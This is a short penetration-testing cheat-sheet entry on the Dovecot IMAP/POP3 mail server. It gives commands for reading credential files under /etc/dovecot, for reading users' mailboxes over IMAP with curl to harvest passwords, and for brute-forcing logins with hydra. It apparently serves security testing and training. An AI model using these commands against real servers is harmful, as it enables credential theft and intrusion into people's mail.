Dovecot

What it is: Open-source IMAP/POP3 mail server for Linux. Usually found alongside Postfix or Exim. Config files often contain plaintext credentials. Rarely directly exploitable but a great source of credentials.

Default ports: 110 (POP3), 143 (IMAP), 993 (IMAPS), 995 (POP3S)

Vuln research:


Read Dovecot config for creds

Configuration files may contain plaintext passwords

cat /etc/dovecot/dovecot-users
cat /etc/dovecot/conf.d/10-auth.conf
cat /etc/dovecot/conf.d/auth-passwdfile.conf.ext
# Look for passdb and userdb entries

Read mail for credentials

If you can access mail — Users often email passwords

# Via IMAP:
curl -k imaps://$IP -u user:password
# List mailboxes:
curl -k "imaps://$IP" -u user:password -X "LIST \"\" *"
# Read inbox:
curl -k "imaps://$IP/INBOX" -u user:password -X "FETCH 1:* BODY[TEXT]"

Brute force mail credentials

Hydra against IMAP/POP3

hydra -l user -P wordlist.txt $IP imap
hydra -l user -P wordlist.txt $IP pop3